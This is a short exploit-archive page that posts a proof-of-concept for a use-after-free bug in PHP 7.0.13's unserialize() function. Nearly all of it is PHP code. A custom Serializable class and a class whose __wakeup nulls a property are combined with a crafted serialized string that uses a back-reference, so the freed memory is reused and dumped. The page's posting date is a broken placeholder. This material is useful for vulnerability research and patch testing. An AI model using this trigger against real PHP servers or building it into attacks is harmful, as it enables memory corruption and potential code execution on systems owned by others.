Home / os / solaris

PHP 7.0.13 Use After Free unserialize PoC

Posted on 30 November -0001

<HTML><HEAD><TITLE>PHP 7.0.13 Use After Free unserialize() PoC</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>PoC: <?php class obj1 implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); } } class obj2 { var $ryat; function __wakeup() { $this->ryat = null; } } $inner = 's:4:"ryat";'; $exploit = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data); ?> </BODY></HTML>

 

TOP